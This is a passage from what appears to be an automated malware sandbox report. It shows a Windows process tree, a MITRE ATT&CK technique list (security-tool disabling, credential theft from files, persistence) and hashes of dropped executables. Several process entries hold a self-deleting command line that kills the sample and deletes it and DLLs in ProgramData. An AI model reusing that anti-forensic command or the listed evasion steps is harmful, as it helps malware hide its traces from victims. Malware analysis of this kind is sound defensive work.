                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 6981.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6981.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1796
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /im 6981.exe /f
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:3264
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout /t 6
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:4228
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6B86.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\6B86.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:2664
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6B86.exe
                                                                                                                                                                          "{path}"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2880
                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1956
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:3364
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3CF8.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3CF8.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              PID:2484
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 3CF8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3CF8.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2376
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    taskkill /im 3CF8.exe /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:1980
                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:5628

                                                                                                                                                                              Network

                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                              Execution

                                                                                                                                                                              Scheduled Task

                                                                                                                                                                              1
                                                                                                                                                                              T1053

                                                                                                                                                                              Persistence

                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                              1
                                                                                                                                                                              T1031

                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                              2
                                                                                                                                                                              T1060

                                                                                                                                                                              Scheduled Task

                                                                                                                                                                              1
                                                                                                                                                                              T1053

                                                                                                                                                                              BITS Jobs

                                                                                                                                                                              1
                                                                                                                                                                              T1197

                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                              Scheduled Task

                                                                                                                                                                              1
                                                                                                                                                                              T1053

                                                                                                                                                                              Defense Evasion

                                                                                                                                                                              Modify Registry

                                                                                                                                                                              5
                                                                                                                                                                              T1112

                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                              3
                                                                                                                                                                              T1089

                                                                                                                                                                              BITS Jobs

                                                                                                                                                                              1
                                                                                                                                                                              T1197

                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                              1
                                                                                                                                                                              T1130

                                                                                                                                                                              Credential Access

                                                                                                                                                                              Credentials in Files

                                                                                                                                                                              4
                                                                                                                                                                              T1081

                                                                                                                                                                              Discovery

                                                                                                                                                                              Query Registry

                                                                                                                                                                              4
                                                                                                                                                                              T1012

                                                                                                                                                                              System Information Discovery

                                                                                                                                                                              5
                                                                                                                                                                              T1082

                                                                                                                                                                              Security Software Discovery

                                                                                                                                                                              1
                                                                                                                                                                              T1063

                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                              1
                                                                                                                                                                              T1120

                                                                                                                                                                              Collection

                                                                                                                                                                              Data from Local System

                                                                                                                                                                              4
                                                                                                                                                                              T1005

                                                                                                                                                                              Command and Control

                                                                                                                                                                              Web Service

                                                                                                                                                                              1
                                                                                                                                                                              T1102

                                                                                                                                                                              Replay Monitor

                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                              Downloads

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                MD5

                                                                                                                                                                                213e00f202cd18120a1e44ea3a93d267

                                                                                                                                                                                SHA1

                                                                                                                                                                                ff07223275c627f04f64b8dc691a2e9eb0239883

                                                                                                                                                                                SHA256

                                                                                                                                                                                1ba80ea646c4375e8c7aa286eb25600013d13540d3324996db6a824d0ef9a7ae

                                                                                                                                                                                SHA512

                                                                                                                                                                                a4c9c443341d3943c9453ac1237e54f70f942a5c3c6032e86b942d8d16b8acffe61c0f3c1feec9d90d926be147e4272b477f423c830bee09287abf67596e78b2

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                MD5

                                                                                                                                                                                35a5ab71990f411955cba00ae4dcc346

                                                                                                                                                                                SHA1

                                                                                                                                                                                c69ae00c634b1a9f0d90eb7564e2f14fcf5114bc

                                                                                                                                                                                SHA256

                                                                                                                                                                                5fbdd9a6cf0bc06c5e9d51ce01bb0e537a7581627be1420b29e36dec46067eee

                                                                                                                                                                                SHA512

                                                                                                                                                                                af70223952937f8eeb4d79b63367da28cfec1f9fa296966176ff574d20702443f8e1209633b9505232640ea4442f251b830e51b4c8acc3dba67b28ecf5b4a5d5

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                MD5

                                                                                                                                                                                4b3ecfd7962409783ec27af6e91fd3e6

                                                                                                                                                                                SHA1

                                                                                                                                                                                2a0d7a91b5c209870ef59bbebc891ae4c2e49e86

                                                                                                                                                                                SHA256

                                                                                                                                                                                fb83a4aeb2788acbba044aa9baf3df8dc498e5057c69302e27944dd43b5c3b80

                                                                                                                                                                                SHA512

                                                                                                                                                                                dfa17db6f119403890d2b07ddabd513cde348214aeac8b6fd163e278451df745e023a56b265f3d5b96897ac4eb2566cf0484d5ff5a170b61702718e85a98653d

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                MD5

                                                                                                                                                                                cef89d04fa3477fcb884e62360d439d3

                                                                                                                                                                                SHA1

                                                                                                                                                                                4865aafe08e0da79fee9092703b0e6780c60a79d

                                                                                                                                                                                SHA256

                                                                                                                                                                                e2864a5601d49e90485674542ba3919b2d3f04fe28fad5c01adbd72ba946f3c6

                                                                                                                                                                                SHA512

                                                                                                                                                                                b930905966f75c21d7af77bdf5e8754df62a03ff9234930d72097cded27153acdf33dfc069735b3fb7d48e469af6f9cd76e54e46c9a759672f6581432ffb7e7d

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\libcurl.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                SHA1

                                                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                SHA256

                                                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                SHA512

                                                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\libcurlpp.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                SHA1

                                                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                SHA256

                                                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                SHA512

                                                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\libgcc_s_dw2-1.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                SHA1

                                                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                SHA256

                                                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                SHA512

                                                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\libstdc++-6.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                SHA1

                                                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                SHA256

                                                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                SHA512

                                                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\libwinpthread-1.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                SHA1

                                                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                SHA256

                                                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                SHA512

                                                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\setup_install.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                SHA1

                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                SHA256

                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                SHA512

                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\setup_install.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                SHA1

                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                SHA256

                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                SHA512

                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_1.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                SHA1

                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                SHA256

                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                SHA512

                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_1.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                SHA1

                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                SHA256

                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                SHA512

                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_1.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                SHA1

                                                                                                                                                                                5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                SHA256

                                                                                                                                                                                a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                SHA512

                                                                                                                                                                                33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_2.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                SHA1

                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                SHA256

                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                SHA512

                                                                                                                                                                                db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_2.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                SHA1

                                                                                                                                                                                f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                SHA256

                                                                                                                                                                                365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                SHA512

                                                                                                                                                                                db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_3.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                SHA1

                                                                                                                                                                                979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                SHA256

                                                                                                                                                                                d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                SHA512

                                                                                                                                                                                fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_3.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                SHA1

                                                                                                                                                                                979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                SHA256

                                                                                                                                                                                d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                SHA512

                                                                                                                                                                                fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_4.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                SHA1

                                                                                                                                                                                cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                SHA256

                                                                                                                                                                                755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                SHA512

                                                                                                                                                                                c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_4.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                SHA1

                                                                                                                                                                                cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                SHA256

                                                                                                                                                                                755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                SHA512

                                                                                                                                                                                c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_5.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                SHA1

                                                                                                                                                                                0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                SHA256

                                                                                                                                                                                8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                SHA512

                                                                                                                                                                                bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_5.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                SHA1

                                                                                                                                                                                0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                SHA256

                                                                                                                                                                                8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                SHA512

                                                                                                                                                                                bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_6.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                SHA1

                                                                                                                                                                                82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                SHA256

                                                                                                                                                                                a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                SHA512

                                                                                                                                                                                f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_6.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                SHA1

                                                                                                                                                                                82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                SHA256

                                                                                                                                                                                a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                SHA512

                                                                                                                                                                                f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                MD5

                                                                                                                                                                                99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                SHA1

                                                                                                                                                                                d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                SHA256

                                                                                                                                                                                586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                SHA512

                                                                                                                                                                                952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                SHA1

                                                                                                                                                                                dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                SHA256

                                                                                                                                                                                8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                SHA512

                                                                                                                                                                                7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                MD5

                                                                                                                                                                                b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                SHA1

                                                                                                                                                                                d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                SHA256

                                                                                                                                                                                fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                SHA512

                                                                                                                                                                                98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                SHA1

                                                                                                                                                                                1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                SHA256

                                                                                                                                                                                a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                SHA512

                                                                                                                                                                                3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                SHA1

                                                                                                                                                                                1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                SHA256

                                                                                                                                                                                a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                SHA512

                                                                                                                                                                                3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                74231678f536a19b3016840f56b845c7

                                                                                                                                                                                SHA1

                                                                                                                                                                                a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                SHA256

                                                                                                                                                                                cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                SHA512

                                                                                                                                                                                4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                74231678f536a19b3016840f56b845c7

                                                                                                                                                                                SHA1

                                                                                                                                                                                a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                SHA256

                                                                                                                                                                                cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                SHA512

                                                                                                                                                                                4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                              • C:\Users\Admin\Documents\1u4LSc52RMY1dQa2h5QXObxK.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                4118b65bb36b2037b08b1cb8f3500fde

                                                                                                                                                                                SHA1

                                                                                                                                                                                cd9f5d9ddf206e69572444523ea96ca1fd1332ae

                                                                                                                                                                                SHA256

                                                                                                                                                                                342d473a1823700bb85ca5d7634c277eec041f4e0187d6bb07a7ee598488d520

                                                                                                                                                                                SHA512

                                                                                                                                                                                b4333ecec95daa0a12b0e78bd53211a06b0c9447b5ca3578e0419945de99bb0b11e8b634b7cce80615980af349a52a69605565e38dc5fa687002d71267a21c90

                                                                                                                                                                              • C:\Users\Admin\Documents\1u4LSc52RMY1dQa2h5QXObxK.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                4118b65bb36b2037b08b1cb8f3500fde

                                                                                                                                                                                SHA1

                                                                                                                                                                                cd9f5d9ddf206e69572444523ea96ca1fd1332ae

                                                                                                                                                                                SHA256

                                                                                                                                                                                342d473a1823700bb85ca5d7634c277eec041f4e0187d6bb07a7ee598488d520

                                                                                                                                                                                SHA512

                                                                                                                                                                                b4333ecec95daa0a12b0e78bd53211a06b0c9447b5ca3578e0419945de99bb0b11e8b634b7cce80615980af349a52a69605565e38dc5fa687002d71267a21c90

                                                                                                                                                                              • C:\Users\Admin\Documents\2YED6U_GcSMKOiJmOtkM9R6c.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                a859c25241faaed5b2e5ba77df675c7a

                                                                                                                                                                                SHA1

                                                                                                                                                                                67a82130e0f469f0f9cc4c93ce8e18b1fc75d03e

                                                                                                                                                                                SHA256

                                                                                                                                                                                01231eca957afc2c4434a96042ecea5fa2ef583e061b405508420f93907b58cc

                                                                                                                                                                                SHA512

                                                                                                                                                                                1bfdd4ebf7fe8b6ea840e4d980b92f051c36b452aaa95afeaa37cbfa04b3f153e8bb91c6f0ae942913400f66a789230b0ea515b6d7ca19f3f91e563804eeea9d

                                                                                                                                                                              • C:\Users\Admin\Documents\2YED6U_GcSMKOiJmOtkM9R6c.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                a859c25241faaed5b2e5ba77df675c7a

                                                                                                                                                                                SHA1

                                                                                                                                                                                67a82130e0f469f0f9cc4c93ce8e18b1fc75d03e

                                                                                                                                                                                SHA256

                                                                                                                                                                                01231eca957afc2c4434a96042ecea5fa2ef583e061b405508420f93907b58cc

                                                                                                                                                                                SHA512

                                                                                                                                                                                1bfdd4ebf7fe8b6ea840e4d980b92f051c36b452aaa95afeaa37cbfa04b3f153e8bb91c6f0ae942913400f66a789230b0ea515b6d7ca19f3f91e563804eeea9d

                                                                                                                                                                              • C:\Users\Admin\Documents\5NssNgtnU7M3s135qV5zI5Pr.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                aa9124c12966683d88fe529aa56a2b8e

                                                                                                                                                                                SHA1

                                                                                                                                                                                12b4555318b2bbd25755e5ad5763eac36d43d7cb

                                                                                                                                                                                SHA256

                                                                                                                                                                                504d241693fbcf7ebad0c3643bc9cad39272ca6b39b67200da91bade6524c066

                                                                                                                                                                                SHA512

                                                                                                                                                                                3e1e57e6b0f3c67d1e691c0a436aeb06b30ee1be0e844c58183c317a626e2f2c9bc749168810677d94ac2ab6dab506923f2c7af256fe4abcf5ac53034dd14aa4

                                                                                                                                                                              • C:\Users\Admin\Documents\5NssNgtnU7M3s135qV5zI5Pr.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                aa9124c12966683d88fe529aa56a2b8e

                                                                                                                                                                                SHA1

                                                                                                                                                                                12b4555318b2bbd25755e5ad5763eac36d43d7cb

                                                                                                                                                                                SHA256

                                                                                                                                                                                504d241693fbcf7ebad0c3643bc9cad39272ca6b39b67200da91bade6524c066

                                                                                                                                                                                SHA512

                                                                                                                                                                                3e1e57e6b0f3c67d1e691c0a436aeb06b30ee1be0e844c58183c317a626e2f2c9bc749168810677d94ac2ab6dab506923f2c7af256fe4abcf5ac53034dd14aa4

